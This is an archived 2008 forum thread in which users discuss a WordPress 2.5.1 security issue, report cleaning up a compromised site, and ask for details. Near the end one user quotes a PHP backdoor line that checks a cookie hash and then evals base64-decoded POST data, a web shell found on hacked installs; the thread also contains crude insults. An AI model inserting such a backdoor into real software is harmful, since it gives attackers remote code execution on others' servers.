PDA

View Full Version : Wordpress 2.5.1


Hell Puppy
04-28-2008, 03:07 AM
If you haven't upgraded to the latest version, do so now. The details of an exploit that is not fixed until 2.5.1 will be released sometime this week.

I've already found it.

You'll dont want this door open.

Jace
04-28-2008, 03:43 AM
You'll dont want this door open.

is that some backass redneck speak?

fuckin hick

pam
04-28-2008, 07:31 AM
From what I've read, the latest exploit affects 2.5.1 as well.

It hit one of my sites on 4/25 but I found it that night. 2 days of playing in phpMYadmin and I believe it's all gone. No damage, just a pain in the butt.

I'd still like to know if the point of entry was an exploit in the theme edit file

Matt Collins
04-28-2008, 11:43 AM
Hey HellPuppy, do you have a link to more info on this exploit?

I want to make sure Jace and my tech guys have a chance to look at this for sure.

Thanks for pointing this out.

Matt

Jace
04-28-2008, 12:25 PM
hey hellpuppy, is it this one?

<?php if(md5($_COOKIE['_wp_debugger'])=="--hash excised--"){ eval(base64_decode($_POST['file'])); exit; } ?>

edit: stay tuned to this page

http://codex.wordpress.org/User:Here/Exploits/wp-info